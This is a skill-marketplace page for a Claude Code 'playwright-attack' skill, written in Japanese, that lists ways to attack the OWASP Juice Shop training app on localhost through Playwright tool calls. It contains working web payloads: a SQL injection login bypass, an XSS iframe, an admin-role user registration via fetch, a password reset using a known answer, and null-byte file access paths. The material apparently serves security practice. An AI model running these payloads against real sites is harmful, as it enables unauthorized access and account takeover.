nwiizo/contests/juice_shop/.claude/skills/playwright-attack
contests/juice_shop/.claude/skills/playwright-attack/SKILL.md
# Playwright Attack Patterns Juice Shop を Playwright MCP で攻撃するパターン集。 ## SQLi ログイン ``` 1. browser_navigate → http://localhost:3000/#/login 2. browser_snapshot → ref確認 3. browser_type → email: "' OR 1=1--" 4. browser_type → password: "a" 5. browser_click → Loginボタン ``` ## XSS 攻撃 ``` browser_navigate → http://localhost:3000/#/search?q=<iframe src="javascript:alert('xss')"> ``` ## API 操作 (fetch) ```javascript browser_evaluate → function: () => fetch('/api/Users', { method: 'POST', headers
$ install --global
skillsauthnpx skillsauth add nwiizo/workspace_2026 contests/juice_shop/.claude/skills/playwright-attackInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 7, 2026, 8:19 PM4.8s1 file scanned
SKILL.md
Playwright Attack Patterns
Juice Shop を Playwright MCP で攻撃するパターン集。
SQLi ログイン
1. browser_navigate → http://localhost:3000/#/login
2. browser_snapshot → ref確認
3. browser_type → email: "' OR 1=1--"
4. browser_type → password: "a"
5. browser_click → Loginボタン
XSS 攻撃
browser_navigate → http://localhost:3000/#/search?q=<iframe src="javascript:alert('xss')">
API 操作 (fetch)
browser_evaluate → function:
() => fetch('/api/Users', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({email: '[email protected]', password: 'test', role: 'admin'})
}).then(r => r.json())
隠しページアクセス
/#/score-board /#/administration
/#/web3-sandbox /#/tokensale-ico-ea
/ftp /metrics
/support/logs
パスワードリセット
1. browser_navigate → /#/forgot-password
2. browser_type → email: "[email protected]"
3. browser_type → answer: "Zaya"
4. browser_type → password: 新パスワード
5. browser_click → Reset
Poison Null Byte
/ftp/package.json.bak%2500.md
/ftp/eastere.gg%2500.md
/ftp/coupons_2013.md.bak%2500.md
トラブルシューティング
「既存のブラウザ セッションで開いています」:
rm -rf ~/Library/Caches/ms-playwright/mcp-chrome-*
Related Skills
nwiizo/echo-skill
tools
VerifiedTrustedCommunity
Use when the user provides an arbitrary line of text and you must echo it back verbatim, prefixed with "ECHO:".
43SKILL.mdUpdated May 15, 2026
nwiizo/zap-triage
development
VerifiedTrustedCommunity
Turn OWASP ZAP JSON reports into code-level remediation work for any authorized web application without launching unscoped scans.
43SKILL.mdUpdated Apr 24, 2026
nwiizo/tools/vigil/skills/owasp-assessment
tools
VerifiedTrustedCommunity
# OWASP Assessment — 詳細仕様 2つの OWASP 標準に基づく網羅的セキュリティ検査。 - **OWASP Top 10:2021** — Web アプリケーション向け(A01〜A10) - **OWASP API Security Top 10:2023** — API 向け(API1〜API10) 各カテゴリに対して: 検査項目、CWE マッピング、grep パターン、判定基準、Opus 4.6 による深掘りポイントを定義する。 --- # Part 1: OWASP Top 10:2021(Web アプリケーション) 公式: https://owasp.org/Top10/ ## A01:2021 — Broken Access Control **概要:** アクセス制御の不備。ユーザーが許可された範囲を超えて操作できる。2021年版で1位に上昇。テスト対象の94%で検出。 **主要 CWE:** - CWE-200: 機密情報の未認可アクターへの露出 - CWE-201: 送信データへの機密情報の挿入 - CWE-352: CSRF -
43SKILL.mdUpdated Apr 7, 2026
nwiizo/memory-optimizer
development
VerifiedTrustedCommunity
Refactors CLAUDE.md into minimal startup context by extracting path-specific rules, skills, commands, and agents. Use when CLAUDE.md exceeds 50 lines, startup feels slow, memory needs restructuring, or splitting monolithic project instructions.
43SKILL.mdUpdated Apr 7, 2026